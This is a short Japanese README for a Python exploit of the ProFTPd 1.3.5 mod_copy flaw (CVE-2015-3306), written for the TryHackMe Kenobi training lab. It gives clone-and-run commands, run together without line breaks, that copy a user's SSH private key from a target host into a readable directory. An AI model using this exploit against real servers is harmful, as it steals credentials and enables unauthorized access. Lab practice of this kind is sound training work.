
これは、ProFTPd 1.3.5 の mod_copy (CVE-2015-3306) 脆弱性に対する単一ファイルのエクスプロイトです。特に TryHackMe Kenobi Lab 向けです。
CVE-2015-3306 は、ProFTPd 1.3.5 に見つかった脆弱性で、FTPファイルコピー操作を有効にする mod_copy モジュールの欠陥に起因します。この脆弱性により、THMプレイヤーはSSH秘密鍵を共有領域にコピーし、それをローカルシステムにマウントできるため、SSH秘密鍵を使用してユーザーに接続することができます。
sudo apt-get updatesudo apt-get install gitgit clone https://github.com/Z3R0-0x30/CVE-2015-3306.gitcd CVE-2015-3306python3 Z3R0_ProFTPexploit.py [target-IP] [SSH private key location] [destination to copy the private key]python3 Z3R0_ProFTPexploit.py 10.10.132.123 /home/user/.ssh/id_rsa /var/tmp/id_rsa